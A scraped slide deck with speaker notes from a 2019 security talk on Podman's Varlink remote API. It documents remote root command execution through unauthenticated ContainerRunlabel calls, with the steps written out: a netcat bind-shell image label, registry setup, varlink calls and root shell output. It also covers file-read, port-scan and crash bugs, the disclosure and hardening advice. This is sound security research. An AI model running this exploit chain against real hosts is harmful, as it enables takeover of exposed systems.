Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Ransomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdfRansomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdf
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
 

Adventures with Podman and Varlink

  • 1. Adventures with Podman and Varlink Jeremy Brown 10/2019
  • 2. whoami (No fancy title/bio today) • ~decade in the industry • @ Amazon, Microsoft, Nvidia playing offense, defense whatever … generally trying to be effective across security domains as well as my own fun research • Prior published research • Bugs on many different platforms, clients, servers, drivers, virtual appliances, cloud, fuzzing, generally exploring and thinking about how to break and/or fix lots of different stuff, …. References: https://packetstormsecurity.com/files/author/6650/ https://www.slideshare.net/JeremyBrown37/presentations
  • 3. whoami ok ok if you must you can call me uh… Senior CEO of Independent Research, Manager et al
  • 4. Agenda I. Podman? Varlink? II. Local and remote attack surface III. Some bugs and bad configurations IV. Exploitation V. Hardening VI. Conclusion “You get on the horn, I throw some peanuts at ‘em and we’ll in Des Moines in no time….” Reference: Tommy Boy (movie)
  • 5. What is Varlink? • Newer IPC protocol, implementation and toolset • JSON based protocol for exchanging messages • Meant to be an upgrade over D-bus, BUS1, custom proto /w unix sockets, etc • “plain-text, type-safe, discoverable, self-documenting, remotable, testable, easy to debug… accessible from any programming environment” • Not much security chatter on it • But OSS-fuzz seems to have picked it up recently References https://varlink.org https://github.com/systemd/systemd/tree/master/test/fuzz/fuzz-varlink
  • 6. What is Varlink? Reference: https://github.com/varlink/python
  • 7. What is Varlink? • A few different components and deployment scenarios • Clients and services support for many different languages and system setups • Even can setup a kernel driver to query via device:/dev/org.kernel….stuff • It does a lot of stuff, but let’s focus on how it fits with Podman • They integrated Varlink to create ways to do “remote API” functionality Reference: http://www.projectatomic.io/blog/2018/05/podman-varlink/
  • 9. What is Podman? • Lots of local podman commands map to varlink remote API methods • https://github.com/containers/libpod/tree/master/cmd/podman • https://github.com/containers/libpod/tree/master/pkg/varlinkapi • Also not much public security research on it • Only (1) CVE so far • https://www.cvedetails.com/cve/CVE-2018-10856/ Reference: https://github.com/containers/libpod/
  • 10.
  • 11. Together by default on Fedora Server • Podman + Varlink installed out of the box instead of Docker • Also rumored that RHEL8 will have Podman too • RedHat and Fedora folks seem to really like it • Remote services aren’t running by default AFAIK yet • They can be configured to run in different ways and some projects want or support listening over the network setups Reference: https://dwalsh.fedorapeople.org/ReplacingDockerWithPodman.pdf
  • 12. Focus and !focus • Focus • Podman (1.4/1.5) + Varlink integration • Remote APIs • Local or remote privilege escalation on the HOST • !focus • Container escapes, although these are cool too
  • 13. So how do I run this thing? Reference: https://github.com/containers/libpod/issues/3344
  • 14. Attack Surface • podman local process running as root • ACLs say if a unprivileged user can talk to it or not
  • 15. But I was promised remote?
  • 16. Attack Surface • podman listening for connections on localhost or network • Now that’s a remote API!
  • 17. Now how do I talk to this thing? Reference: https://github.com/containers/libpod/blob/master/cmd/podman/varlink/io.podman.varlink
  • 18. Oh.
  • 19. Or…
  • 20. Attack Surface • Code vs live query look
  • 21. How do I test this thing? • dnf install python3-varlink References: https://varlink.org/python/ https://blog.tomecek.net/post/recent-news-in-container-tech/
  • 22. How do I test this thing? Command line
  • 23. Let’s look at the API docs “You had me at hello” Reference: https://github.com/containers/libpod/blob/master/API.md#ContainerRunlabel
  • 24. Quick look @ images.go Reference: https://github.com/containers/libpod/blob/ed3acaecbfeead3b0fef5928e47ecc9f34cd8d5b/utils/utils.go
  • 25. Uh what’s a label? Reference: https://podman.io/blogs/2018/12/03/podman-runlabel.html
  • 26. Ok create a cool Dockerfile FROM busybox LABEL run=“nc -l -p 10000 -e /bin/bash” $ docker build -t imageX . or other stuff for your reverse jazz… References: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ https://i.blackhat.com/USA-19/Thursday/us-19-Edwards-Compendium-Of-Container-Escapes.pdf
  • 27. And setup a private docker registry to host it $ docker-compose up $ docker tag image localhost:5000/imageX $ docker push localhost:5000/imageX (edit /etc/containers/registries.conf for testing) [registries.insecure] registries = [‘docker-registry:5000’]
  • 28. See if it works via command line
  • 30. Oh, not that root I guess :’( amicontained?? Additional reading: https://lwn.net/Articles/532593/
  • 31. Unless it’s running as root ami-not-so-contained??
  • 32. So that means… • Running podman as root • You get root • Running podman as rootless • You get…. somebody 
  • 33. So how about that remote API? # podman --log-level debug varlink --timeout=0 tcp:0.0.0.0:6000 DEBU[0000] Using varlink socket: tcp:0.0.0.0:6000 DEBU[0000] Initializing boltdb state at /var/lib/containers/storage/libpod/bolt_state.db DEBU[0000] Using graph driver overlay DEBU[0000] Using graph root /var/lib/containers/storage …..
  • 34. So how about that remote API? $ varlink call tcp:podman-host:6000/io.podman.ContainerRunlabel '{"Runlabel": {"image":"docker-registry:5000/image3", "label":"run"}}’
  • 35. Check one thing real quick
  • 36. Oh yeah we gotta Pull first $ varlink call tcp:podman-host:6000/io.podman.PullImage '{"name":"docker-registry:5000/image3"}’ { "reply": { "id": "7276ba03be37ab344f17ab5c97209ec1cf397ea43006f441e6a1540c3da4b5b2", "logs": [ "Copying blob sha256:ee153a04d6837058642958836062f20badf39f558be3e6c7c7773ef7d8301d90n", "Copying config sha256:7276ba03be37ab344f17ab5c97209ec1cf397ea43006f441e6a1540c3da4b5b2n", ….. $ Reference: https://github.com/containers/libpod/blob/master/API.md#PullImage
  • 37. So how about that remote API? (what we see server side) ….. DEBU[0312] parsed reference into "[overlay@/var/lib/containers/storage+/var/run/containers/storage:overlay. mountopt=nodev,metacopy=on]docker-registry:5000/image3:latest" DEBU[0312] parsed reference into "[overlay@/var/lib/containers/storage+/var/run/containers/storage:overlay. mountopt=nodev,metacopy=on]@7276ba03be37ab344f17a.…" DEBU[0312] exporting opaque data as blob "sha256:7276ba03be37ab344f17a…."
  • 38. All good ;-] $ nc podman-host 10000 id uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:system_r:container_runtime_t:s0-s0:c0.c1023 ls /root anaconda-ks.cfg original-ks.cfg
  • 39. Now time for a quick recap “DO NOT CONFIGURE YOUR PODMAN WITHOUT AUTH” There is remote-client now (uses SSH) which makes this easier & may become the standard way of doing things Reference: https://github.com/containers/libpod/blob/b32cb4b750842212f8002e030db63e92c6485fdc/docs/tutorials/remote_client.md
  • 40. Insecure configs • Listen as privileged on an open ACL unix socket • Eg. unix:/run/blah where access isn’t restricted Local command execution Reference: https://docs.rs/varlink/8.1.0/varlink/
  • 41. Insecure configs • Listen on loopback • Eg. tcp:127.0.0.1:6000 Local command execution
  • 42. Insecure configs • Listen on network • Eg. tcp:0.0.0.0:6000 Remote command execution
  • 43. Podman is …. new • Like 2017ish (?) new • Similar introduction for Varlink actually • We really don’t know how or where it will be deployed • What weird secure or insecure ways admins will want to use it • But there’s an opportunity to get security right before it takes off
  • 44. And there’s an appetite for remote stuff Reference: https://github.com/containers/libpod/issues/935
  • 45. Are devs using it like this? • Gopodman • Podman Varlink API client in Go • And it was built for this exact purpose Reference: https://github.com/praveenkumar/gopodman
  • 47.
  • 49. Are there any docs telling you not to? • Not that I know of :’) • Podman project should the explicitly document and make known the risk that remote API over plain TCP is insecure, especially given the set of APIs available • Hopefully this research will make a positive impact
  • 50. What about SSH? • It does provide advantages over plain Varlink over TCP such as encrypted connections, built-in auth gateway, etc • There’s some docs on how to use it… “securely” (?) Reference: https://podman.io/blogs/2019/01/16/podman-varlink.html
  • 51. Varlink bridge mode • Bridge + SSH auth > running it over TCP /w no auth • But not everyone is doing it this way Reference: https://varlink.org/FAQ.html
  • 52. And Varlink isn’t in the business of auth Reference: https://varlink.org/FAQ.html
  • 53. Return of Remote API: Trivial API crashes • Would be remote DoS of podman & some may still work in releases Reference: https://github.com/containers/libpod/issues?utf8=%E2%9C%93&q=is%3Aissue+api+crash
  • 54. Interesting APIs • Here’s a few that made the list • ImportImage(), LoadImage(), RemoveImage(), SearchImages() • Also some need an “upgraded connection” • Attach(), SendFile(), ReceiveFile(), etc • Probably some fun stuff to do there Reference: https://varlink.org/FAQ.html
  • 55. So we can also do stuff like this
  • 56. We can manipulate server URL requests via SearchImages()
  • 57. Even better… • By appending ‘/’ onto search queries, it parses this to mean we’re talking to a registry • And after best effort concatenations….
  • 58. Let’s try some stuff > dir traversal for arbitrary cert consumption > get server to read arbitrary local files > internal/external port scan
  • 59. Lots of… other code • Actually part of the code being executed here is in a different project • https://github.com/containers/image/blob/master/pkg/tlsclientconfig/tlsclie ntconfig.go#L20 • https://github.com/containers/libpod/blob/master/pkg/registries/registries.g o attack surface++
  • 60. So like various blind file reads, port scan, etc • Undesired behavior for sure… but more like white elephant bugs without a full exploit chain
  • 61. More stuff? • Crash on malformed API call (looks like null ptr deref; fixed in 1.5.1)
  • 62. More stuff? • Panic due to likely trying to operate on data that isn’t there • Simple empty or missing ‘name’ parameter, or invalid name, etc… • Other variants too, kinda hard to not crash the server using this API
  • 63. More Stuff? Doesn’t check if strings in volume array are empty or if they match exactly?
  • 64. Maybe some more API tests or ???
  • 65. Testing these issues $ sudo dnf install -t python3-podman-api (or python3-varlink works too) • But doesn’t support every single API that we need
  • 66.
  • 67. “Live” • We can capture with socat to save the raw API call and then replay it $ socat TCP-LISTEN:7000 TCP:localhost:6000 {"method":"io.podman.ContainerRunlabel","parameters":{"Runlabel":{"image": "docker-registry:5000/image3","label":"run"}}} ^^ and then just send it over a regular socket + NULL byte (per spec)
  • 69. Sharing this data with folks • Took a little time to find the right people to talk to about the bugs • Now there is a documented security@ email DL for security comms, but I was recommended to send the details to RedHat directly • Initial response re: run label API that they believed the was working as it was designed…. • Yes, but when you Remote API w/o auth it works unintendedly very well for everyone  • Expecting some more bug fixes for the API issues and updated docs and/or runtime flags to mitigate the risks insecure Remote API setup • At least once crash already fixed in 1.5.1
  • 70. Discovery • Look for UNIX sockets you can connect to with Varlink client $ lsof -U • Look for loopback or network services that speak the protocol $ echo -e "{}0" | nc localhost 6000 {"parameters":{"parameter":"method"},"error":"org.varlink.service.InvalidParam eter"}
  • 71. Discovery $ varlink info tcp:podman-host:6000 Vendor: Atomic Product: podman Version: 1.5.1 URL: https://github.com/containers/libpod Interfaces: org.varlink.service io.podman
  • 73. Hardening • ACLs • Choose mode appropriately on registration (the more restrictive the better) • Choose the more locked down /run directory vs others less so (not /tmp) • Privileges • Run services (or even resolver service) as lower privileged users if possible (instead of root) • If not rootless, drop privileges when doing serious stuff with APIs
  • 74. Hardening • Remote access • Do not run Podman over native Varlink using only TCP • Use SSH (key + password) related methods to protect the connection and provide auth so not just anyone can pwn ‘n own • Understand that even /w remote auth, local users may still be able to hit APIs • Try to always run rootless to mitigate impact of bugs
  • 75. Conclusion • Varlink and Podman are still pretty new and need more research • Security maturity will come with time, hardening efforts and more audits • Code to test the found issues to be released shortly • Things can only get better • For now, if you’re building systems with them, remember to isolate + auth • More fixes and better security documentation to come • https://github.com/containers/libpod/commits/master Reference: https://github.com/containers/libpod/commit/080abfd22228bcc2b254d76aea0636642dd6bccd

Notas del editor

  1. Some people really like titles and stuff
  2. Tommy Boy reference
  3. Start a server listening on a local socket, loopback or on the network
  4. Like Docker… same CLI, but different design Written in Go, at least libpod is Go
  5. 1.4.4-4.fc30 1.5.1-3.fc30
  6. Sudo make me a sandwich, cool
  7. Could be listening as root, could be any user as long as they have bind perms for that port
  8. So either way, not a small number of target APIs
  9. Now there’s some python libraries to help
  10. Or just command line
  11. Container metadata basically
  12. Even though we’re running commands on the host and not in a container, it’s already started setting up the environment for a container And since I didn’t mount a fs/volume/etc, it’s probably just dropping us into the host filesystem
  13. Slight difference
  14. Slight difference
  15. Run the server
  16. Issue the call as a remote client
  17. To make sure it’s available locally for Podman to use
  18. Now we’ve pulled down a container image, ran a label and got a root shell all remotely
  19. In case that wasn’t clear already
  20. Some documentation suggests unrestricted access when setting up varlink server instances…
  21. So we can exploit Podman via Gopodman’s documented insecure config
  22. Creates tunnel for stdin/stdout to call methods
  23. It’s a protocol, auth is left to whoever is deploying it… not saying that’s right or wrong
  24. Searching the libpod github for API issues
  25. Haven’t dug into the upgraded connection ones, but there’s probably some interesting stuff there too
  26. If you’re talking to a registry, it also tries to look for certs on the local filesystem
  27. If you import code from somewhere else, it’s now “your code” Reference: https://github.com/containers/libpod/blob/master/vendor/modules.txt
  28. But there’s definitely a lack of input validation and trusting parameters coming in that allows unintended things like this to happen
  29. /dev/null is not the problem here, some buffer calculation error probably, but unlikely a buffer overflow cause it’s in Go and it’s a panic on some null ptr thing We can attach to podman with gdb here but… it’s a little awkward and I guess has a learning curve to use on Go compiled code
  30. Uhhh… is it supposed to be removing “similar” names or just exact ones? Also empty volume name removes the first one in alphabetical order?? Might be a functional bug here if nothing else If you CreateVolumes, I’m pretty sure it doesn’t start making you them in alphabetical order…
  31. Again, this stuff is new
  32. “It’s always a good time to get pickled” – sorry, inside joke
  33. But that’s ok, we’ll do it live
  34. Again this is a shell on the host, not the container, probably due to us not mounting volumes or anything when we’re running the label within the container execution environment
  35. So how do you find varlink services
  36. Check our all the methods a service exposes
  37. This *may* be the first security talk on either on them, and I hope this has been helpful, but I also hope it’s not the last